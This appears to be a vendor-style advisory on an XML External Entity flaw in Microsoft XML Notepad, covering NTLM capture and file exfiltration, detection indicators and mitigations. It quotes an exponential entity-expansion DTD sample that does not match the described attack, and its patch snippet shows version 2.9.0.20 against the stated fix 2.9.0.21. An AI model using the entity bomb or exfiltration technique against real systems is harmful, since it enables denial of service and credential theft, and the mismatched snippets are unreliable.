CVE-2026-34401 Overview
CVE-2026-34401 is an XML External Entity (XXE) vulnerability affecting Microsoft XML Notepad, a Windows application that provides a simple intuitive User Interface for browsing and editing XML documents. Prior to version 2.9.0.21, XML Notepad does not disable DTD processing by default, which means external entities are resolved automatically. This creates an attack surface where a malicious DTD file can be crafted to force XML Notepad to make outbound HTTP/SMB requests, potentially leaking local file contents or capturing the victim's NTLM credentials.
Critical Impact
Attackers can craft malicious XML files with embedded DTD references to exfiltrate sensitive local files or capture NTLM credentials through forced SMB authentication requests.
Affected Products
- Microsoft XML Notepad versions prior to 2.9.0.21
Discovery Timeline
- 2026-03-31 - CVE-2026-34401 published to NVD
- 2026-04-01 - Last updated in NVD database
Technical Details for CVE-2026-34401
Vulnerability Analysis
This vulnerability is classified as CWE-611: Improper Restriction of XML External Entity Reference. The core issue stems from XML Notepad's default configuration, which permits DTD processing and external entity resolution. When a user opens a maliciously crafted XML document, the parser automatically processes any referenced DTD files, including those pointing to external resources controlled by an attacker.
The attack can be weaponized in two primary ways: local file disclosure through file:// URI schemes, and NTLM credential theft through forced SMB connections to attacker-controlled servers. The network attack vector requires user interaction to open the malicious file, but once opened, the exploitation occurs automatically without additional user consent.
Root Cause
The root cause is the insecure default configuration of XML Notepad's XML parser. By default, DTD processing is enabled without restrictions on external entity resolution. This allows XML documents to define and reference external entities that can access local file system resources or initiate network connections. The application did not implement security-conscious defaults that would disable DTD processing or restrict external entity resolution to trusted sources only.
Attack Vector
The attack requires an attacker to deliver a malicious XML file to a victim. This can be accomplished through phishing emails, malicious downloads, or compromised file shares. When the victim opens the XML file in XML Notepad, the embedded DTD reference triggers automatic processing. The DTD can contain entity definitions that reference external URLs or local files.
For NTLM credential theft, the attacker's DTD references an SMB share on an attacker-controlled server. When the victim's system attempts to authenticate to the SMB share, NTLM hashes are transmitted and can be captured for offline cracking or relay attacks. For file exfiltration, the DTD uses file:// entities to read local files and transmit their contents to an attacker-controlled server through error messages or out-of-band channels.
<!DOCTYPE root [
<!-- This XML Document demonstrates a DTD entity explosion risk. Please make sure you
know and trust the DTD's you process before you enable DTD processing in XML Notepad. -->
<!ELEMENT root (#PCDATA)>
<!ENTITY e0 "This is some long text that we will replicate exponentially">
<!ENTITY e1 "&e0;&e0;&e0;&e0;&e0;&e0;&e0;&e0;&e0;&e0;">
<!ENTITY e2 "&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;">
<!ENTITY e3 "&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;">
<!ENTITY e4 "&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;">
]>
<root>&e4;</root>
Source: GitHub Commit c03ab23
Detection Methods for CVE-2026-34401
Indicators of Compromise
- Unexpected outbound SMB connections (port 445) to external IP addresses when XML files are opened
- Unusual HTTP requests originating from XML Notepad process to unknown external domains
- Network traffic containing file:// or \\ URI references in XML content
- Presence of XML files with suspicious DTD declarations referencing external resources
Detection Strategies
- Monitor network connections from XmlNotepad.exe for unexpected outbound traffic to external hosts
- Implement file content scanning for XML documents containing external entity declarations or DOCTYPE references to remote URLs
- Configure endpoint detection rules to alert on SMB authentication attempts triggered by document applications
- Enable network traffic analysis to detect XXE-based data exfiltration patterns
Monitoring Recommendations
- Deploy SentinelOne Singularity XDR to detect anomalous process behavior when XML Notepad initiates network connections
- Configure SIEM alerts for outbound SMB traffic from non-browser Windows applications
- Monitor Windows Security Event Logs for NTLM authentication events correlated with XML Notepad execution
- Implement DNS logging to identify lookups for potentially malicious domains referenced in DTD files
How to Mitigate CVE-2026-34401
Immediate Actions Required
- Update Microsoft XML Notepad to version 2.9.0.21 or later immediately
- Educate users about the risks of opening untrusted XML files from unknown sources
- Review and quarantine any recently opened XML files from untrusted sources
- Block outbound SMB traffic (port 445) at the network perimeter for non-essential hosts
Patch Information
Microsoft has addressed this vulnerability in XML Notepad version 2.9.0.21. The patch modifies the default DTD processing behavior and adds user prompts when DTD settings are changed. Users should update to this version or later through the official GitHub release. For detailed technical information, refer to the GitHub Security Advisory GHSA-5j32-486h-42ch.
Workarounds
- Disable DTD processing in XML Notepad settings if the option is available in your version
- Use alternative XML editors that disable external entity resolution by default
- Implement network segmentation to prevent workstations from making direct outbound SMB connections
- Configure Windows Defender Firewall to block XML Notepad from making outbound connections
# Security patch version update from commit 3665603
<ApplicationRevision>20</ApplicationRevision>
<ApplicationVersion>2.9.0.20</ApplicationVersion>
Source: GitHub Commit 3665603
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
